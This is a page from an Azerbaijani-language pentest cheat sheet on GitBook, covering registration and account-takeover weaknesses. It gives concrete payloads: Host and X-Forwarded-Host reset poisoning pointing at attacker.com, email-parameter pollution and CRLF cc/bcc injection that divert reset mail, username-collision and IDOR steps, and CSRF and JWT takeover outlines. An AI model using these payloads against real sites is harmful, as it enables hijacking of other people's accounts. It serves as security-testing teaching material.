Pentest və SOC Cheat Sheet
  • Reconnaissance
  • Post-Explotation
    • Linux Post-Explotation
      • Linux Local Enumeration
      • Linux Privilege Escalation
      • Dumping and cracking hashes on Linux
      • Linux Persistence
    • Windows Post-Explotation
      • Windows Local Enumeration
      • Windows Privilege Escalation
      • Windows Persistence
  • Network Services Pentesting
    • 21-Pentesting FTP
    • 22-Pentesting SSH
    • 23-Pentesting Telnet
    • 53-Pentesting DNS
    • 25,465,587-Pentesting SMTP
    • 110,995-Pentesting POP
    • 139,445-Pentesting SMB
    • 3306-Pentesting MySQL
    • 3389-Pentesting RDP
    • 1433-Pentesting MSSQL-Microsoft SQL Server
    • 389,636,3268,3269-Pentesting LDAP
  • Web Pentesting
    • Broken Access Control
      • Praktiki nümunə
    • OS Command Injection
      • Praktiki nümunə
    • SQL Injection
      • Praktiki nümunə
    • Cross-Site-Scripting (XSS)
      • Praktiki nümunə
    • File Upload
      • Praktiki nümunə
    • Directory Traversal və Path Traversal
      • Praktiki nümunə
    • CSRF
    • XXE
    • Clickjacking
      • Praktiki nümunə
    • SSRF
      • Praktiki nümunə
    • JWT (Json Web Token)
      • Praktiki nümunə
    • Local&Remote File İnclusion
      • Praktiki nümunə
      • Local File inclusion ilə reverse shell almaq
    • 401&403 Bypass
    • Login Bypass
    • Open Redirect
    • Unicode Injection
    • Security Misconfiguration
    • CRLF injection
    • LDAP Injection
    • Cookies Hacking
    • Cross site WebSocket hijacking (CSWSH)
    • SSTI (Server Side Template Injection)
    • CSTI (Client Side Template Injection)
    • XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
    • Registration & Takeover Vulnerabilities
    • Regular expression Denial of Service - ReDoS
    • Reset/Forgotten Password Bypass
    • SAML Hücumları
    • Reverse Tab Nabbing
    • Web Tool - WFuzz
    • XPATH enjeksiyonu
    • Server-Side Includes (SSI) Injection
    • Edge Side Inclusion Injection (ESII)
    • Race Condition
    • PostMessage
    • Parameter Pollution
    • Cache Poisoning and Cache Deception
    • Captcha Bypass
  • AD Pentesting
    • Domain Enumeration
      • PowerView ilə enumeration
      • AD Module ilə enumeration
      • BloodHound ilə enumeration
        • On Site BloodHound
      • Using Adalanche
        • Remote adalanche
      • Useful Enumeration Tools
    • Local Privilege Escalation
      • Useful Local Priv Esc Tools
      • UAC Bypass
    • Lateral Movement
      • Powershell Remoting
      • Mimikatz
      • Remote Desktop Protocol
      • URL File Attacks
      • Useful Tools
    • Domain Privilege Escalation
      • Kerberoast
      • ASREPRoast
      • Password Spray Attack
      • Force Set SPN
      • Abusing Shadow Copies
      • List and Decrypt Stored Credentials using Mimikatz
      • Unconstrained Delegation
      • Constrained Delegation
      • Resource Based Constrained Delegation
      • DNSAdmins Abuse
      • Abusing Active Directory-Integraded DNS (ADIDNS) poisoning
      • Abusing Backup Operators Group
      • SID History Abuse
      • Active Directory Certificate Services
    • Domain Persistence
      • Golden Ticket Attack
      • Silver Ticket Attack
      • Skeleton Key Attack
      • DSRM Abuse
      • DCsync Attack
    • Cross Forest Attacks
      • Trust Tickets
      • Abuse MSSQL Servers
      • Breaking Forest Trusts
  • SOC - Cheat Sheet
    • SOC Nədir?
    • SOC Komponentləri Nələrdir?
    • SOC Checklist
    • SIEM
      • Splunk Qurulması və Konfiqurasiyası
    • IDS/IPS
    • Firewall
    • Firewall qurulması və konfiqurasiyası
    • EDR/XDR
    • SOAR
    • Windows Commands for SOC analysts
      • GUI Programs in Windows
      • Event Viewer
      • Task Scheduler
      • Group Policy Editor
      • Device Manager
      • Task Manager
      • Registry Manager
    • Linux Commands for SOC analysts
    • LOLBAS Apps and Commands
      • Apps and Commands
Powered by GitBook
On this page
  • Dublikat Qeydiyyat
  • Username Enumeration
  • Parol Siyasəti
  • E-maili dəyişmək
  • Daha çox yoxlama
  • Password Reset Takeover
  • Password Reset Token Leak Via Referrer
  • Password Reset Poisoning
  • E-poçt Parametri ilə Parolun Sıfırlanması
  • API Parametrlərində IDOR
  • Zəif Parol Sıfırlama Tokeni
  • Sızan Parol Sıfırlama Tokeni
  • Password Reset Via Username Collision
  • Account Takeover
  • Account Takeover via JWT

Was this helpful?

  1. Web Pentesting

Registration & Takeover Vulnerabilities

Dublikat Qeydiyyat

  • Mövcud istifadəçi adından istifadə edərək yaratmağa çalışın

  • E-poçtun dəyişdiyini yoxlayın:

    • böyük hərf

    • +1@

    • e-poçta bəzilərini əlavə edin

    • e-poçt adındakı xüsusi simvollar (%00, %09, %20)

    • E-poçtdan sonra black simvol qoyun: [email protected] a

    • [email protected]@attacker.com

    • [email protected]@gmail.com

Username Enumeration

Tətbiq daxilində istifadəçi adının nə vaxt qeydiyyatdan keçdiyini anlaya bildiyinizi yoxlayın.

Parol Siyasəti

İstifadəçi yaratmaq parol siyasətini yoxlayın (zəif parollardan istifadə edə bildiyinizi yoxlayın). Bu halda siz etimadnaməsini bruteforce etməyə cəhd edə bilərsiniz.

E-maili dəyişmək

Qeydiyyatdan keçdiyiniz zaman e-poçtu dəyişdirməyə çalışın və bu dəyişikliyin düzgün şəkildə təsdiqlənib-keçilmədiyini yoxlayın və ya onu ixtiyari e-poçtlara dəyişə bilər.

Daha çox yoxlama

  1. Birdəfəlik e-poçtlardan istifadə edə bildiyinizi yoxlayın

  2. Uzun parol (>200) DoS-ə gətirib çıxarır

  3. Hesabın yaradılması zamanı tarif limitlərini yoxlayın

  4. username@burp_collab.net istifadə edin və callback təhlil edin

Password Reset Takeover

Password Reset Token Leak Via Referrer

  • E-poçt ünvanınıza parol sıfırlamasını tələb edin

  • Parol sıfırlama linkinə klikləyin

  • Parolu dəyişməyin

  • İstənilən 3-cü tərəf saytlarına klikləyin (məsələn: Facebook, twitter)

  • Burp Suite proxy-də sorğuya müdaxilə edin

  • İstinad başlığının parol sıfırlama nişanı sızdığını yoxlayın.

Password Reset Poisoning

  1. Burp Suite-də parol sıfırlama sorğusuna müdaxilə edin

  2. Burp Suite-də aşağıdakı başlıqları əlavə edin və ya redaktə edin: Host: attacker.com, X-Forwarded-Host: attacker.com

  3. Sorğunu dəyişdirilmiş başlıqla yönləndirin http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com

  4. Host başlığına əsaslanan parol sıfırlama URL-ni axtarın: https://attacker.com/reset-password.php?token=TOKEN

E-poçt Parametri ilə Parolun Sıfırlanması

# parameter pollution
[email protected]&[email protected]

# array of emails
{"email":["[email protected]","[email protected]"]}

# carbon copy
[email protected]%0A%0Dcc:[email protected]
[email protected]%0A%0Dbcc:[email protected]

# separator
[email protected],[email protected]
[email protected]%[email protected]
[email protected]|[email protected]

API Parametrlərində IDOR

  1. Təcavüzkar öz hesabı ilə daxil olmalı və Parolun dəyişdirilməsi funksiyasına keçməlidir.

  2. Burp Suite-i işə salın və sorğunu kəsin

  3. Onu repeater nişanına göndərin və parametrləri redaktə edin:

    powershell POST /api/changepass [...] ("form": {"email":"[email protected]","password":"securepwd"})

Zəif Parol Sıfırlama Tokeni

Parol sıfırlama nişanı təsadüfi yaradılmalı və hər dəfə unikal olmalıdır. Tokenin müddətinin bitdiyini və ya həmişə eyni olub olmadığını müəyyən etməyə çalışın, bəzi hallarda nəsil alqoritmi zəifdir və onu təxmin etmək olar. Aşağıdakı dəyişənlər alqoritm tərəfindən istifadə edilə bilər.

  • Vaxt möhürü

  • İstifadəçi adı

  • İstifadəçinin E-poçtu

  • Ad və Soyad

  • Doğum tarixi

  • Kriptoqrafiya

  • Yalnız nömrə

  • Kiçik işarə ardıcıllığı ( [A-Z,a-z,0-9] arasındakı simvollar)

  • Tokenin təkrar istifadəsi

  • Tokenin istifadə müddəti

Sızan Parol Sıfırlama Tokeni

  1. Xüsusi e-poçt üçün API/UI istifadə edərək parol sıfırlama sorğusunu işə salın, məsələn: [email protected]

  2. Server cavabını yoxlayın və resetToken olub olmadığını yoxlayın

  3. Sonra https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL] kimi URL-də işarədən istifadə edin.

Password Reset Via Username Collision

  1. Sistemdə qurbanın istifadəçi adı ilə eyni olan istifadəçi adı ilə, lakin istifadəçi adından əvvəl və/və ya sonra boşluqlar qoyulmaqla qeydiyyatdan keçin. məsələn: "admin "

  2. Zərərli istifadəçi adınızla parol sıfırlamasını tələb edin.

  3. E-poçtunuza göndərilən işarədən istifadə edin və qurban parolunu sıfırlayın.

  4. Yeni parol ilə qurban hesabına qoşulun.

Account Takeover

  1. CSRF üçün payload yaradın, məsələn: “Parol dəyişikliyi üçün avtomatik təqdim edilən HTML forması”

  2. Payloadı göndərin

Account Takeover via JWT

JSON Web Token istifadəçinin autentifikasiyası üçün istifadə edilə bilər.

  1. JWT-ni başqa İstifadəçi ID/E-poçt ilə redaktə edin

  2. Zəif JWT imzasını yoxlayın

PreviousXSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)NextRegular expression Denial of Service - ReDoS

Last updated 1 year ago

Was this helpful?